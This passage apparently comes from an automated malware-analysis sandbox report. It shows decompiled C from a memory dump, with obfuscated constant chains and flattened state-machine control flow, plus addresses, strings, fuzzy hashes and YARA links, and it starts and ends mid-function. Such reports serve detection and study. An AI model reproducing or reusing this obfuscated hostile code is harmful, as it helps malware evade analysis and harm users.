				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x0000bfb2;
				_v576 = 0xb0922b;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x0000519f;
				_v608 = 0x2c9814;
				_t245 = 0x7d;
				_v608 = _v608 * 0x4a;
				_v608 = _v608 / _t245;
				_v608 = _v608 ^ 0x00178a35;
				_v636 = 0xf2d9c0;
				_v636 = _v636 | 0x54e01d72;
				_v636 = _v636 + 0x6544;
				_v636 = _v636 >> 0xf;
				_v636 = _v636 ^ 0x000a2d53;
				_v652 = 0xb79a3c;
				_v652 = _v652 >> 0xb;
				_v652 = _v652 + 0xffffdf1c;
				_v652 = _v652 >> 2;
				_v652 = _v652 ^ 0x3ffc62d8;
				_v588 = 0xbbfe4d;
				_v588 = _v588 | 0x3351f96c;
				_v588 = _v588 ^ 0x33fb4a4f;
				_v644 = 0x3291d3;
				_v644 = _v644 ^ 0x460a35a5;
				_t246 = 0x6a;
				_t265 = _v600;
				_v644 = _v644 * 0x4f;
				_v644 = _v644 >> 2;
				_v644 = _v644 ^ 0x2ad23f95;
				_v596 = 0x9f8ced;
				_v596 = _v596 / _t246;
				_v596 = _v596 ^ 0x0008339d;
				_v616 = 0xa6cd37;
				_v616 = _v616 << 6;
				_v616 = _v616 >> 7;
				_v616 = _v616 ^ 0x005e2ae9;
				_v660 = 0x4f1fa2;
				_v660 = _v660 ^ 0x78d81b3c;
				_v660 = _v660 << 2;
				_t226 = _v660;
				_t247 = 0x60;
				_t263 = _t226 % _t247;
				_v660 = _t226 / _t247;
				_v660 = _v660 ^ 0x025c3918;
				_v624 = 0x91099f;
				_v624 = _v624 | 0x66e8eabd;
				_v624 = _v624 * 0xe;
				_v624 = _v624 ^ 0xa1a477ee;
				_v620 = 0xa7dcdd;
				_v620 = _v620 + 0x55de;
				_v620 = _v620 >> 0x10;
				_v620 = _v620 ^ 0x000e970c;
				_v580 = 0xe3c04f;
				_v580 = _v580 >> 0xf;
				_v580 = _v580 ^ 0x000f90f4;
				do {
					while(_t266 != 0x51690a9) {
						if(_t266 == 0x5aedfcc) {
							_t266 = 0x8a4b63d;
							continue;
						}
						if(_t266 == 0x5b7ca33) {
							_t231 = E1001E737(_t247);
							_t268 = _v572 - _v548;
							asm("sbb ecx, [esp+0x84]");
							__eflags = _v568 - _t263;
							if(__eflags < 0) {
								L21:
								return _t240;
							}
							if(__eflags > 0) {
								L20:
								_t240 = 1;
								__eflags = 1;
								goto L21;
							}
							__eflags = _t268 - _t231;
							if(_t268 < _t231) {
								goto L21;
							}
							goto L20;
						}
						if(_t266 == 0x8a4b63d) {
							_t234 = E1001E780(_v648, __eflags, _v656,  &_v524);
							_pop(_t247);
							__eflags = _t234;
							if(__eflags == 0) {
								goto L21;
							}
							_t266 = 0x51690a9;
							continue;
						}
						if(_t266 == 0x9a4f40c) {
							_t263 = _v580;
							E1001C3E5(_v620, _t263,  &_v572);
							_pop(_t247);
							_t266 = 0x5b7ca33;
							continue;
						}
						if(_t266 == 0xbb1c1c0) {
							_push(_t247);
							_t186 =  &_v636; // 0x5e2ae9
							_t238 = E1001694E( *_t186, _v652, _v588, _v644,  &_v564, _t265);
							_t263 = _v616;
							asm("sbb esi, esi");
							_t247 = _v596;
							_t266 = ( ~_t238 & 0x05e8a496) + 0x3bc4f76;
							E100074B2(_t247, _t263, _v660, _t265, _v624);
							_t273 =  &(_t273[9]);
						}
						goto L15;
					}
					_t247 = 0;
					_t230 = E1001CCFE(0, _v632, _v604, _v600, _v640, _v612, _v628,  &_v524, _v592, _v576, 0, _v608, _v584);
					_t265 = _t230;
					_t273 =  &(_t273[0xc]);
					__eflags = _t230 - 0xffffffff;
					if(__eflags == 0) {
						_t266 = 0x3bc4f76;
						goto L15;
					}
					_t266 = 0xbb1c1c0;
					continue;
					L15:
				} while (_t266 != 0x3bc4f76);
				goto L21;
			}

0x100179ec
0x100179f2
0x100179fc
0x10017a04
0x10017a0c
0x10017a14
0x10017a1c
0x10017a21
0x10017a29
0x10017a31
0x10017a39
0x10017a3e
0x10017a46
0x10017a4e
0x10017a60
0x10017a65
0x10017a6b
0x10017a70
0x10017a72
0x10017a7a
0x10017a7f
0x10017a87
0x10017a8c
0x10017a94
0x10017a9c
0x10017aa4
0x10017ab1
0x10017ab4
0x10017abd
0x10017ac1
0x10017ac9
0x10017ad1
0x10017ad9
0x10017ade
0x10017ae6
0x10017af6
0x10017aff
0x10017b02
0x10017b06
0x10017b0e
0x10017b16
0x10017b26
0x10017b2a
0x10017b32
0x10017b3a
0x10017b42
0x10017b47
0x10017b4f
0x10017b57
0x10017b5c
0x10017b64
0x10017b71
0x10017b72
0x10017b7c
0x10017b80
0x10017b88
0x10017b90
0x10017b98
0x10017ba0
0x10017ba7
0x10017bb4
0x10017bbc
0x10017bc1
0x10017bc9
0x10017bce
0x10017bd6
0x10017bde
0x10017be6
0x10017bee
0x10017bf6
0x10017c05
0x10017c08
0x10017c0c
0x10017c10
0x10017c15
0x10017c1d
0x10017c2d
0x10017c31
0x10017c39
0x10017c41
0x10017c46
0x10017c4b
0x10017c53
0x10017c5b
0x10017c63
0x10017c68
0x10017c6c
0x10017c6d
0x10017c6f
0x10017c73
0x10017c7b
0x10017c83
0x10017c90
0x10017c94
0x10017c9c
0x10017ca4
0x10017cac
0x10017cb1
0x10017cb9
0x10017cc1
0x10017cc6
0x10017cce
0x10017cce
0x10017ce0
0x10017d9c
0x00000000
0x10017d9c
0x10017cec
0x10017dfe
0x10017e07
0x10017e12
0x10017e19
0x10017e1b
0x10017e29
0x10017e32
0x10017e32
0x10017e1d
0x10017e23
0x10017e25
0x10017e25
0x00000000
0x10017e25
0x10017e1f
0x10017e21
0x00000000
0x00000000
0x00000000
0x10017e21
0x10017cf8
0x10017d83
0x10017d89
0x10017d8a
0x10017d8c
0x00000000
0x00000000
0x10017d92
0x00000000
0x10017d92
0x10017d00
0x10017d56
0x10017d63
0x10017d68
0x10017d69
0x00000000
0x10017d69
0x10017d08
0x10017d0e
0x10017d21
0x10017d25
0x10017d37
0x10017d3b
0x10017d3d
0x10017d47
0x10017d49
0x10017d4e
0x10017d4e
0x00000000
0x10017d08
0x10017dba
0x10017dd9
0x10017dde
0x10017de0
0x10017de3
0x10017de6
0x10017df2
0x00000000
0x10017df2
0x10017de8
0x00000000
0x10017df4
0x10017df4
0x00000000

Strings

S-, xrefs: 10017BA7
*^, xrefs: 10017D21
32, xrefs: 10017B2A

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: 32$S-$*^
API String ID: 0-4271420140
Opcode ID: 8cbe86c44efcff53ff9fbecf3c745d0282fc29f250647c6d63b9353d02cbfb56
Instruction ID: 90f26ef16116152a56048681910353fb6258098c42a220a97a4f0f053e8f6e84
Opcode Fuzzy Hash: 8cbe86c44efcff53ff9fbecf3c745d0282fc29f250647c6d63b9353d02cbfb56
Instruction Fuzzy Hash: B2B135728083809BD358CF64C98A81FFBF1FBC4798F105A1DF5899A260D7B5D989CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1001E2E4, Relevance: 4.0, Strings: 3, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001E2E4() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _t216;
				void* _t218;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int* _t258;

				_t258 =  &_v1124;
				_v1052 = 0x4dce3;
				_t251 = 0;
				_t218 = 0xf0ca99a;
				_v1048 = 0;
				_v1044 = 0;
				_v1084 = 0xc85199;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 >> 2;
				_v1084 = _v1084 ^ 0x028419c2;
				_v1088 = 0x17a2c7;
				_v1088 = _v1088 << 3;
				_t252 = 7;
				_t216 = 0x68;
				_v1088 = _v1088 * 0x38;
				_v1088 = _v1088 ^ 0x2953d81e;
				_v1100 = 0x38d161;
				_v1100 = _v1100 >> 7;
				_v1100 = _v1100 + 0xffff6203;
				_v1100 = _v1100 + 0xffff7009;
				_v1100 = _v1100 ^ 0xfffa47ac;
				_v1092 = 0x4fc30a;
				_v1092 = _v1092 + 0xffff15da;
				_v1092 = _v1092 / _t252;
				_v1092 = _v1092 ^ 0x000d312b;
				_v1116 = 0xa3b704;
				_v1116 = _v1116 + 0xc3bb;
				_v1116 = _v1116 + 0x35f5;
				_v1116 = _v1116 + 0xffffee03;
				_v1116 = _v1116 ^ 0x00ad5d84;
				_v1072 = 0x3983e5;
				_v1072 = _v1072 >> 0xe;
				_v1072 = _v1072 | 0xa347ec2b;
				_v1072 = _v1072 ^ 0xa345789c;
				_v1060 = 0xb76868;
				_v1060 = _v1060 << 9;
				_v1060 = _v1060 ^ 0x6ed7337d;
				_v1068 = 0xe2bfa8;
				_v1068 = _v1068 | 0x6c1065a2;
				_t253 = 0x31;
				_v1068 = _v1068 * 0x5b;
				_v1068 = _v1068 ^ 0xba6bad30;
				_v1124 = 0x7efd31;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 / _t216;
				_v1124 = _v1124 / _t253;
				_v1124 = _v1124 ^ 0x00001b2f;
				_v1064 = 0xe3f2bd;
				_v1064 = _v1064 >> 1;
				_v1064 = _v1064 | 0x7e0e45cf;
				_v1064 = _v1064 ^ 0x7e7646ee;
				_v1112 = 0x869424;
				_v1112 = _v1112 << 0xe;
				_v1112 = _v1112 | 0xfefe7fe7;
				_v1112 = _v1112 ^ 0xfff6d3a5;
				_v1076 = 0x9199ef;
				_v1076 = _v1076 + 0xffff422f;
				_v1076 = _v1076 + 0x3456;
				_v1076 = _v1076 ^ 0x009acf5a;
				_v1120 = 0xa884e6;
				_v1120 = _v1120 + 0x19ff;
				_v1120 = _v1120 + 0xffff970a;
				_v1120 = _v1120 | 0x7799023d;
				_v1120 = _v1120 ^ 0x77b6f4cb;
				_v1108 = 0xfa8d93;
				_v1108 = _v1108 << 0xd;
				_v1108 = _v1108 ^ 0x7828b856;
				_v1108 = _v1108 / _t216;
				_v1108 = _v1108 ^ 0x0064f1a3;
				_v1080 = 0xd0807f;
				_t254 = 0x4c;
				_v1080 = _v1080 * 0x7e;
				_v1080 = _v1080 / _t254;
				_v1080 = _v1080 ^ 0x01535879;
				_v1056 = 0x5c1e66;
				_t255 = 0x12;
				_v1056 = _v1056 * 0x57;
				_v1056 = _v1056 ^ 0x1f42d000;
				_v1096 = 0x649d97;
				_v1096 = _v1096 / _t255;
				_v1096 = _v1096 * 0x11;
				_v1096 = _v1096 ^ 0x5e0db8c5;
				_v1096 = _v1096 ^ 0x5e5894e4;
				_v1104 = 0x939821;
				_v1104 = _v1104 + 0xffffcde1;
				_v1104 = _v1104 | 0x0534a191;
				_v1104 = _v1104 * 0xc;
				_v1104 = _v1104 ^ 0x4496eb1d;
				do {
					while(_t218 != 0x1a95d3c) {
						if(_t218 == 0x22bc64f) {
							E1001E780(_v1084, __eflags, _v1088,  &_v520);
							_t218 = 0x5fad6e0;
							continue;
						} else {
							if(_t218 == 0x5fad6e0) {
								_push(_v1072);
								_push(_v1116);
								_push(_v1092);
								E100049CE( *0x10025208 + 0x230,  *0x10025208 + 0x1c, E1000416C(_v1100, 0x100017d4), _v1060, _v1068, _v1100, _v1124, _v1064);
								E1000B952(_v1112, _t210, _v1076, _v1120);
								_t258 =  &(_t258[0xc]);
								_t218 = 0x76addbc;
								continue;
							} else {
								if(_t218 == 0x76addbc) {
									__eflags = E1000D4EE( &_v520,  &_v1040, __eflags, _v1108, _v1080);
									_t251 =  !=  ? 1 : _t251;
									_t218 = 0x1a95d3c;
									continue;
								} else {
									if(_t218 == 0xf0ca99a) {
										_t218 = 0x22bc64f;
										continue;
									}
								}
							}
						}
						goto L11;
					}
					E1000C29B(_v1056, _v1096, _v1104,  &_v1040);
					_t218 = 0x1b8e551;
					L11:
					__eflags = _t218 - 0x1b8e551;
				} while (__eflags != 0);
				return _t251;
			}

0x1001e2e4
0x1001e2ea
0x1001e2f8
0x1001e2fa
0x1001e2ff
0x1001e303
0x1001e307
0x1001e30f
0x1001e314
0x1001e319
0x1001e321
0x1001e329
0x1001e335
0x1001e338
0x1001e339
0x1001e33d
0x1001e345
0x1001e34d
0x1001e352
0x1001e35a
0x1001e362
0x1001e36a
0x1001e372
0x1001e382
0x1001e386
0x1001e38e
0x1001e396
0x1001e39e
0x1001e3a6
0x1001e3ae
0x1001e3b6
0x1001e3be
0x1001e3c3
0x1001e3cb
0x1001e3d3
0x1001e3db
0x1001e3e0
0x1001e3e8
0x1001e3f0
0x1001e3ff
0x1001e400
0x1001e404
0x1001e40c
0x1001e414
0x1001e421
0x1001e42b
0x1001e42f
0x1001e437
0x1001e43f
0x1001e443
0x1001e44b
0x1001e453
0x1001e45b
0x1001e460
0x1001e468
0x1001e470
0x1001e478
0x1001e480
0x1001e488
0x1001e490
0x1001e498
0x1001e4a0
0x1001e4a8
0x1001e4b0
0x1001e4b8
0x1001e4c2
0x1001e4cc
0x1001e4dc
0x1001e4e2
0x1001e4ef
0x1001e4fc
0x1001e4ff
0x1001e50b
0x1001e50f
0x1001e517
0x1001e524
0x1001e525
0x1001e529
0x1001e531
0x1001e53f
0x1001e548
0x1001e54c
0x1001e554
0x1001e55c
0x1001e564
0x1001e56c
0x1001e579
0x1001e57d
0x1001e585
0x1001e585
0x1001e593
0x1001e658
0x1001e65f
0x00000000
0x1001e599
0x1001e59b
0x1001e5de
0x1001e5e7
0x1001e5eb
0x1001e623
0x1001e636
0x1001e63b
0x1001e63e
0x00000000
0x1001e59d
0x1001e5a3
0x1001e5d2
0x1001e5d4
0x1001e5d7
0x00000000
0x1001e5a5
0x1001e5ab
0x1001e5b1
0x00000000
0x1001e5b1
0x1001e5ab
0x1001e5a3
0x1001e59b
0x00000000
0x1001e593
0x1001e677
0x1001e67e
0x1001e683
0x1001e683
0x1001e683
0x1001e69b

Strings

V4, xrefs: 1001E480
+1, xrefs: 1001E386
Fv~, xrefs: 1001E44B

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: +1$V4$Fv~
API String ID: 0-1107463434
Opcode ID: ea0aaad4cd1ff3a248aaeb1beb159f2db40eecddc20356606d192900a127e29d
Instruction ID: fb068559c953e51ae0072f058eba0c58aa71b1bc2af299026814f867cb11782e
Opcode Fuzzy Hash: ea0aaad4cd1ff3a248aaeb1beb159f2db40eecddc20356606d192900a127e29d
Instruction Fuzzy Hash: 0D910FB25093859BC768CF25C98A40FBBF2FBC4758F104A1DF28686264D7B1DA49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 10016015, Relevance: 3.9, Strings: 3, Instructions: 187
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10016015(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t150;
				signed int _t171;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				void* _t188;
				signed int* _t216;
				signed int* _t219;

				_push(_a12);
				_t215 = _a8;
				_t216 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E100167B8(_t150);
				_v92 = 0xb167ba;
				_t219 =  &(( &_v100)[5]);
				_v92 = _v92 + 0xffffadb6;
				_v92 = _v92 ^ 0xa6e4a909;
				_t188 = 0x162605f;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0x32ade3c8;
				_v96 = 0x518bbd;
				_t180 = 0x7a;
				_v96 = _v96 * 0x76;
				_v96 = _v96 / _t180;
				_v96 = _v96 ^ 0x81cd335b;
				_v96 = _v96 ^ 0x818a9114;
				_v64 = 0xde16af;
				_v64 = _v64 << 2;
				_v64 = _v64 | 0x11bdf566;
				_v64 = _v64 ^ 0x13fac877;
				_v52 = 0xac29cf;
				_v52 = _v52 + 0x909a;
				_v52 = _v52 ^ 0x00a1d34c;
				_v68 = 0xec2efe;
				_v68 = _v68 >> 2;
				_t181 = 0x66;
				_v68 = _v68 / _t181;
				_v68 = _v68 ^ 0x000070b2;
				_v60 = 0x783d00;
				_t182 = 0x17;
				_v60 = _v60 / _t182;
				_v60 = _v60 ^ 0x000ef4a1;
				_v84 = 0x51254;
				_v84 = _v84 + 0xffffe044;
				_v84 = _v84 >> 9;
				_v84 = _v84 ^ 0x000cb178;
				_v100 = 0x8e2198;
				_t183 = 0x21;
				_v100 = _v100 * 0x57;
				_v100 = _v100 + 0xffff3753;
				_v100 = _v100 >> 4;
				_v100 = _v100 ^ 0x0301cb36;
				_v56 = 0x12603f;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x0244d4bd;
				_v80 = 0x1aef20;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x6625a101;
				_v80 = _v80 ^ 0x6625f300;
				_v72 = 0x6f573f;
				_t87 =  &_v72; // 0x6f573f
				_v72 =  *_t87 / _t183;
				_v72 = _v72 + 0xffff837b;
				_v72 = _v72 ^ 0x000d4565;
				_v76 = 0xe0a452;
				_v76 = _v76 + 0xa2b0;
				_t184 = 0x35;
				_v76 = _v76 / _t184;
				_v76 = _v76 ^ 0x00030b8d;
				_v48 = 0xe33fe4;
				_t185 = 0xa;
				_v48 = _v48 / _t185;
				_v48 = _v48 ^ 0x00185f2b;
				_v88 = 0x23c51;
				_v88 = _v88 << 0xe;
				_v88 = _v88 | 0x9de9c977;
				_v88 = _v88 ^ 0x9fff5b74;
				do {
					while(_t188 != 0x162605f) {
						if(_t188 == 0x32cf1b6) {
							_push(_t188);
							_t171 = E100134E7(_t188, _t216[1]);
							_t219 =  &(_t219[3]);
							 *_t216 = _t171;
							__eflags = _t171;
							if(__eflags != 0) {
								_t188 = 0xa4e2b47;
								continue;
							}
						} else {
							if(_t188 == 0x34af64c) {
								E1001177E(_t215 + 0x18,  &_v44, __eflags, _v72, _v76);
								_t188 = 0x443a3d0;
								continue;
							} else {
								if(_t188 == 0x443a3d0) {
									E1001177E(_t215 + 0x10,  &_v44, __eflags, _v48, _v88);
								} else {
									if(_t188 == 0x60a8271) {
										E10011C78(_v100,  *((intOrPtr*)(_t215 + 0xc)), _v56,  &_v44, _v80);
										_t219 =  &(_t219[3]);
										_t188 = 0x34af64c;
										continue;
									} else {
										if(_t188 == 0x726e22f) {
											_t216[1] = E10008B74(_t215);
											_t188 = 0x32cf1b6;
											continue;
										} else {
											if(_t188 != 0xa4e2b47) {
												goto L15;
											} else {
												E1000A488(_t216,  &_v44, _v60, _v84);
												_t219 =  &(_t219[2]);
												_t188 = 0x60a8271;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						__eflags =  *_t216;
						_t149 =  *_t216 != 0;
						__eflags = _t149;
						return 0 | _t149;
					}
					_t188 = 0x726e22f;
					 *_t216 =  *_t216 & 0x00000000;
					__eflags =  *_t216;
					_t216[1] = _v92;
					L15:
					__eflags = _t188 - 0xf2d4888;
				} while (__eflags != 0);
				goto L18;
			}

0x1001601c
0x10016023
0x1001602a
0x1001602c
0x1001602d
0x10016035
0x10016036
0x1001603b
0x10016043
0x10016046
0x10016050
0x10016058
0x1001605d
0x10016062
0x1001606a
0x10016079
0x1001607c
0x10016088
0x1001608c
0x10016094
0x1001609c
0x100160a4
0x100160a9
0x100160b1
0x100160b9
0x100160c1
0x100160c9
0x100160d1
0x100160d9
0x100160e2
0x100160e7
0x100160ed
0x100160f5
0x10016101
0x10016106
0x1001610c
0x10016114
0x1001611c
0x10016124
0x10016129
0x10016131
0x1001613e
0x1001613f
0x10016143
0x1001614b
0x10016150
0x10016158
0x10016160
0x10016165
0x1001616d
0x10016175
0x1001617a
0x10016182
0x1001618a
0x10016192
0x10016198
0x1001619c
0x100161a4
0x100161ac
0x100161b4
0x100161c9
0x100161ce
0x100161d4
0x100161dc
0x100161e8
0x100161f0
0x100161f4
0x100161fc
0x10016204
0x10016209
0x10016211
0x10016219
0x10016219
0x1001622b
0x100162dd
0x100162e2
0x100162e7
0x100162ea
0x100162ec
0x100162ee
0x100162f0
0x00000000
0x100162f0
0x10016231
0x10016237
0x100162bc
0x100162c3
0x00000000
0x10016239
0x1001623f
0x10016320
0x10016245
0x1001624b
0x1001629b
0x100162a0
0x100162a3
0x00000000
0x1001624d
0x1001624f
0x1001627d
0x10016280
0x00000000
0x10016251
0x10016253
0x00000000
0x10016259
0x10016267
0x1001626c
0x1001626f
0x00000000
0x1001626f
0x10016253
0x1001624f
0x1001624b
0x1001623f
0x10016237
0x10016327
0x10016329
0x1001632e
0x1001632e
0x10016335
0x10016335
0x100162fb
0x100162fd
0x100162fd
0x10016300
0x10016303
0x10016303
0x10016303
0x00000000

Strings

?Wo, xrefs: 10016192
G+N, xrefs: 100161EB
?, xrefs: 100161DC

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: ?Wo$G+N$?
API String ID: 0-2350949890
Opcode ID: db6f48319570c4982fbef06e54bd7c7bbbf52293271a0a289a49381c412f7f20
Instruction ID: 693031aff4d462291ac0f4f474cc1aa3b9aa6b812b3fd8b26a21a249d48e4bfa
Opcode Fuzzy Hash: db6f48319570c4982fbef06e54bd7c7bbbf52293271a0a289a49381c412f7f20
Instruction Fuzzy Hash: EC8141716083019FC758CF21D98A91BBBF1FBC8748F50891DF1969A260D7B1DA898F82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1AA, Relevance: 3.9, Strings: 3, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1000A1AA(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v564;
				intOrPtr _v576;
				char _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				void* _t120;
				signed int _t132;
				signed int _t135;
				void* _t140;
				signed int _t147;
				intOrPtr _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t169;
				void* _t170;

				_push(_a16);
				_t163 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(E1000AD27);
				E100167B8(_t120);
				_v640 = 0xa9b5ee;
				_t170 = _t169 + 0x18;
				_v640 = _v640 + 0xffff6e26;
				_v640 = _v640 << 3;
				_t140 = 0xe083979;
				_v640 = _v640 ^ 0x054920a2;
				_v628 = 0xb99a15;
				_v628 = _v628 << 0xb;
				_v628 = _v628 | 0x4dfece0d;
				_v628 = _v628 ^ 0xcdfd0534;
				_v620 = 0x32c4df;
				_t164 = 0x43;
				_v620 = _v620 / _t164;
				_v620 = _v620 ^ 0x000cf2c5;
				_v612 = 0xb1f69e;
				_v612 = _v612 + 0xffff2b0c;
				_v612 = _v612 ^ 0x00b9c434;
				_v632 = 0xe7cff0;
				_v632 = _v632 | 0x1062c5f3;
				_t165 = 7;
				_v632 = _v632 / _t165;
				_v632 = _v632 ^ 0x026c690c;
				_v644 = 0xe883f8;
				_t166 = 0x4c;
				_v644 = _v644 * 0x68;
				_v644 = _v644 >> 0xa;
				_v644 = _v644 ^ 0x00169120;
				_v616 = 0x8269e9;
				_v616 = _v616 + 0x9977;
				_v616 = _v616 ^ 0x00819834;
				_v608 = 0xe716d1;
				_v608 = _v608 / _t166;
				_v608 = _v608 ^ 0x000d97d8;
				_v656 = 0x54c167;
				_v656 = _v656 | 0xb2a0b4b6;
				_v656 = _v656 >> 0xc;
				_v656 = _v656 << 0xb;
				_v656 = _v656 ^ 0x597da5a3;
				_v652 = 0x3ab415;
				_v652 = _v652 | 0x5041b4de;
				_v652 = _v652 + 0x345a;
				_v652 = _v652 ^ 0x5074bc40;
				_v624 = 0x234cbf;
				_v624 = _v624 ^ 0xe2f75447;
				_v624 = _v624 ^ 0xe2d6761c;
				_v636 = 0xdb9607;
				_v636 = _v636 >> 0xf;
				_v636 = _v636 + 0xffffdc03;
				_v636 = _v636 ^ 0xfff9da7f;
				_v648 = 0xec215a;
				_t94 =  &_v648; // 0xec215a
				_v648 =  *_t94 * 0x52;
				_v648 = _v648 + 0xffff1760;
				_v648 = _v648 ^ 0x4baa2a15;
				_t167 = _v624;
				do {
					while(_t140 != 0x304c966) {
						if(_t140 == 0x6470ed4) {
							_v564 = 0x22c;
							_t132 = E1001F876(_t167, _v612, _v632, _v644,  &_v564, _v616);
							_t170 = _t170 + 0x10;
							asm("sbb ecx, ecx");
							_t147 =  ~_t132 & 0x00f8a044;
							L9:
							_t140 = _t147 + 0xbc2fbbf;
							continue;
						}
						if(_t140 != 0x773dfea) {
							if(_t140 == 0xbc2fbbf) {
								return E100074B2(_v652, _v624, _v636, _t167, _v648);
							}
							if(_t140 == 0xcbb9c03) {
								_t135 = E1000AD27( &_v564,  &_v604);
								asm("sbb ecx, ecx");
								_t147 =  ~_t135 & 0xf741cda7;
								goto L9;
							} else {
								if(_t140 != 0xe083979) {
									goto L16;
								} else {
									_v576 = _t163;
									_t140 = 0x773dfea;
									continue;
								}
							}
							L19:
							return _t135;
						}
						_t135 = E100164A9(_t140, _v640);
						_t167 = _t135;
						if(_t135 != 0xffffffff) {
							_t140 = 0x6470ed4;
							continue;
						}
						goto L19;
					}
					if(E1000FF17( &_v564, _t167, _v608, _v656) == 0) {
						_t140 = 0xbc2fbbf;
						goto L16;
					} else {
						_t140 = 0xcbb9c03;
						continue;
					}
					goto L19;
					L16:
				} while (_t140 != 0xa6d216f);
				return _t135;
			}

0x1000a1b4
0x1000a1bb
0x1000a1bd
0x1000a1c4
0x1000a1cb
0x1000a1d2
0x1000a1d3
0x1000a1d8
0x1000a1dd
0x1000a1e5
0x1000a1e8
0x1000a1f2
0x1000a1f7
0x1000a1fc
0x1000a209
0x1000a216
0x1000a21b
0x1000a223
0x1000a22b
0x1000a239
0x1000a23e
0x1000a244
0x1000a24c
0x1000a254
0x1000a25c
0x1000a264
0x1000a26c
0x1000a278
0x1000a27d
0x1000a283
0x1000a28b
0x1000a298
0x1000a299
0x1000a29d
0x1000a2a2
0x1000a2aa
0x1000a2b2
0x1000a2ba
0x1000a2c2
0x1000a2d0
0x1000a2d4
0x1000a2dc
0x1000a2e4
0x1000a2ec
0x1000a2f1
0x1000a2f6
0x1000a2fe
0x1000a306
0x1000a30e
0x1000a316
0x1000a31e
0x1000a326
0x1000a32e
0x1000a336
0x1000a33e
0x1000a343
0x1000a34b
0x1000a353
0x1000a35b
0x1000a360
0x1000a364
0x1000a36c
0x1000a374
0x1000a378
0x1000a378
0x1000a386
0x1000a404
0x1000a41b
0x1000a420
0x1000a427
0x1000a429
0x1000a3d2
0x1000a3d2
0x00000000
0x1000a3d2
0x1000a38e
0x1000a392
0x00000000
0x1000a47a
0x1000a39e
0x1000a3c1
0x1000a3ca
0x1000a3cc
0x00000000
0x1000a3a0
0x1000a3a6
0x00000000
0x1000a3ac
0x1000a3ac
0x1000a3b0
0x00000000
0x1000a3b0
0x1000a3a6
0x1000a487
0x1000a487
0x1000a487
0x1000a3e3
0x1000a3e8
0x1000a3ef
0x1000a3f5
0x00000000
0x1000a3f5
0x00000000
0x1000a3ef
0x1000a448
0x1000a454
0x00000000
0x1000a44a
0x1000a44a
0x00000000
0x1000a44a
0x00000000
0x1000a456
0x1000a456
0x00000000

Strings

Z!, xrefs: 1000A35B
Z4, xrefs: 1000A30E
o!m, xrefs: 1000A456

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Z!$Z4$o!m
API String ID: 0-4132503809
Opcode ID: a8e661ff1a630eb2761beff1c70a0858c6f30218407f01c7d586706ba58e1f9d
Instruction ID: 6c1498f6cceb23a39bb5dc0fe5ff030502ca1d40bb0b6ddef084d941fcc88a8c
Opcode Fuzzy Hash: a8e661ff1a630eb2761beff1c70a0858c6f30218407f01c7d586706ba58e1f9d
Instruction Fuzzy Hash: D861CA72509341AFD768DF20CA8981FBBE1FBC5798F405A1DF68656260C3B1CA88CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10009DA8, Relevance: 3.9, Strings: 3, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10009DA8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				char _v596;
				void* _t170;
				signed int _t179;
				signed int _t180;
				signed int _t181;

				_v52 = 0xd0ddb3;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x000552b9;
